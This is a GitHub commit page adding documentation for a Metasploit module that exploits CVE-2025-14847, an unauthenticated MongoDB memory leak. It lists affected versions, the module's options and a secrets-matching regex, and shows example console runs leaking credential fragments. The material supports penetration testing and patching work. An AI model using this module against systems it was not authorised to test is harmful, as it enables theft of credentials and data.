Skip to content

Commit acc206b

Browse files
dledda-r7dledda-r7
authored
Merge pull request #20833 from xaitax/CVE-2025-14847_Mongobleed
Add MongoDB memory disclosure module (CVE-2025-14847)
2 parents 259180e + 3b3d4f2 commit acc206b

File tree

2 files changed

+810
-0
lines changed

2 files changed

+810
-0
lines changed

documentation/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.md

Lines changed: 168 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,168 @@
1+
## Vulnerable Application
2+
3+
This module exploits CVE-2025-14847, a memory disclosure vulnerability in MongoDB's zlib decompression handling, commonly referred to as "Mongobleed."
4+
5+
By sending crafted `OP_COMPRESSED` messages with inflated BSON document lengths, the server allocates a buffer based on the claimed uncompressed size but only fills it with the actual decompressed data. When MongoDB parses the BSON document, it reads beyond the decompressed buffer into uninitialized memory, returning leaked memory contents in error messages.
6+
7+
The vulnerability allows unauthenticated remote attackers to leak server memory which may contain sensitive information such as:
8+
- Database credentials
9+
- Session tokens
10+
- Encryption keys
11+
- Connection strings
12+
- Application data
13+
14+
### Vulnerable Versions
15+
16+
Per [MongoDB JIRA SERVER-115508](https://jira.mongodb.org/browse/SERVER-115508):
17+
18+
- MongoDB 3.6.x (all versions - EOL, no fix available)
19+
- MongoDB 4.0.x (all versions - EOL, no fix available)
20+
- MongoDB 4.2.x (all versions - EOL, no fix available)
21+
- MongoDB 4.4.0 through 4.4.29
22+
- MongoDB 5.0.0 through 5.0.31
23+
- MongoDB 6.0.0 through 6.0.26
24+
- MongoDB 7.0.0 through 7.0.27
25+
- MongoDB 8.0.0 through 8.0.16
26+
- MongoDB 8.2.0 through 8.2.2
27+
28+
### Fixed Versions
29+
30+
- MongoDB 4.4.30
31+
- MongoDB 5.0.32
32+
- MongoDB 6.0.27
33+
- MongoDB 7.0.28
34+
- MongoDB 8.0.17
35+
- MongoDB 8.2.3
36+
37+
## Verification Steps
38+
39+
1. Install a vulnerable MongoDB version (e.g., MongoDB 7.0.15)
40+
2. Start the MongoDB service
41+
3. Start msfconsole
42+
4. `use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed`
43+
5. `set RHOSTS <target>`
44+
6. `run`
45+
7. Verify that memory contents are leaked and saved to loot
46+
47+
## Options
48+
49+
### MIN_OFFSET
50+
Minimum BSON document length offset to test. Default: `20`
51+
52+
### MAX_OFFSET
53+
Maximum BSON document length offset to test. Higher values scan more memory but take longer. Default: `8192`
54+
55+
### STEP_SIZE
56+
Offset increment between probes. Higher values are faster but less thorough. Default: `1`
57+
58+
### BUFFER_PADDING
59+
Padding added to the claimed uncompressed buffer size. Default: `500`
60+
61+
### LEAK_THRESHOLD
62+
Minimum bytes to report as an interesting leak in the output. Default: `10`
63+
64+
### QUICK_SCAN
65+
Enable quick scan mode which samples key offsets (power-of-2 boundaries, etc.) instead of scanning every offset. Much faster but may miss some leaks. Default: `false`
66+
67+
### REPEAT
68+
Number of scan passes to perform. Memory contents change over time, so multiple passes can capture more data. Default: `1`
69+
70+
## Advanced Options
71+
72+
### SHOW_ALL_LEAKS
73+
Show all leaked fragments regardless of size. Default: `false`
74+
75+
### SHOW_HEX
76+
Display hexdump of leaked data. Default: `false`
77+
78+
### SECRETS_PATTERN
79+
Regex pattern to detect sensitive data in leaked memory. Default: `password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth`
80+
81+
### FORCE_EXPLOIT
82+
Attempt exploitation even if the version check indicates the target is patched. Default: `false`
83+
84+
### PROGRESS_INTERVAL
85+
Show progress every N offsets. Set to 0 to disable. Default: `500`
86+
87+
## Scenarios
88+
89+
### MongoDB 7.0.14 on Linux
90+
91+
```
92+
msf6 > use auxiliary/scanner/mongodb/cve_2025_14847_mongobleed
93+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
94+
RHOSTS => 192.168.1.100
95+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
96+
97+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
98+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
99+
[*] 192.168.1.100:27017 - Scanning 8173 offsets (20-8192, step=1)
100+
[+] 192.168.1.100:27017 - offset=20 len=82 : [conn38248] end connection 10.0.0.5:36845 (0 connections now open)
101+
[+] 192.168.1.100:27017 - offset=163 len=617 : driver: { name: "mongoc / ext-mongodb:PHP ", version: "1.24.3" }
102+
[+] 192.168.1.100:27017 - offset=501 len=40 : id bson type in element with field name
103+
[*] 192.168.1.100:27017 - Progress: 500/8173 (6.1%) - 7 leaks found - ETA: 49s
104+
[+] 192.168.1.100:27017 - offset=757 len=12 : password=abc
105+
[!] 192.168.1.100:27017 - Secret pattern detected at offset 757: 'password' in context: ...config: { password=abc123&user=admin...
106+
[*] 192.168.1.100:27017 - Progress: 1000/8173 (12.2%) - 11 leaks found - ETA: 42s
107+
...
108+
109+
[+] 192.168.1.100:27017 - Total leaked: 1703 bytes
110+
[+] 192.168.1.100:27017 - Unique fragments: 13
111+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
112+
113+
[!] 192.168.1.100:27017 - Potential secrets detected:
114+
[!] 192.168.1.100:27017 - - Pattern 'password' at offset 757 (pos 12): ...config: { password=abc123&user=admin...
115+
[*] 192.168.1.100:27017 - Scanned 1 of 1 hosts (100% complete)
116+
[*] Auxiliary module execution completed
117+
```
118+
119+
### Multi-Pass Scan for Maximum Data Collection
120+
121+
```
122+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
123+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set REPEAT 3
124+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set MAX_OFFSET 16384
125+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
126+
127+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
128+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
129+
[*] 192.168.1.100:27017 - Running 3 scan passes to maximize data collection...
130+
[*] 192.168.1.100:27017 - === Pass 1/3 ===
131+
[*] 192.168.1.100:27017 - Scanning 16365 offsets (20-16384, step=1)
132+
...
133+
[*] 192.168.1.100:27017 - Pass 1 complete: 23 new leaks (23 total unique)
134+
[*] 192.168.1.100:27017 - === Pass 2/3 ===
135+
...
136+
[*] 192.168.1.100:27017 - Pass 2 complete: 15 new leaks (38 total unique)
137+
[*] 192.168.1.100:27017 - === Pass 3/3 ===
138+
...
139+
[*] 192.168.1.100:27017 - Pass 3 complete: 8 new leaks (46 total unique)
140+
141+
[+] 192.168.1.100:27017 - Total leaked: 4521 bytes
142+
[+] 192.168.1.100:27017 - Unique fragments: 46
143+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
144+
```
145+
146+
### Quick Scan Mode
147+
148+
```
149+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set RHOSTS 192.168.1.100
150+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > set QUICK_SCAN true
151+
msf6 auxiliary(scanner/mongodb/cve_2025_14847_mongobleed) > run
152+
153+
[*] 192.168.1.100:27017 - MongoDB version: 7.0.14
154+
[+] 192.168.1.100:27017 - Version 7.0.14 is VULNERABLE to CVE-2025-14847
155+
[*] 192.168.1.100:27017 - Scanning 97 offsets (20-8192, step=1, quick mode)
156+
[+] 192.168.1.100:27017 - offset=20 len=45 : connection string fragment...
157+
[+] 192.168.1.100:27017 - offset=128 len=23 : mongodb://admin:pass...
158+
159+
[+] 192.168.1.100:27017 - Total leaked: 234 bytes
160+
[+] 192.168.1.100:27017 - Unique fragments: 5
161+
[+] 192.168.1.100:27017 - Leaked data saved to: /root/.msf4/loot/20251230_mongobleed.bin
162+
```
163+
164+
## References
165+
166+
- https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb
167+
- https://jira.mongodb.org/browse/SERVER-115508
168+
- https://www.mongodb.com/docs/manual/reference/mongodb-wire-protocol/

0 commit comments

Comments
 (0)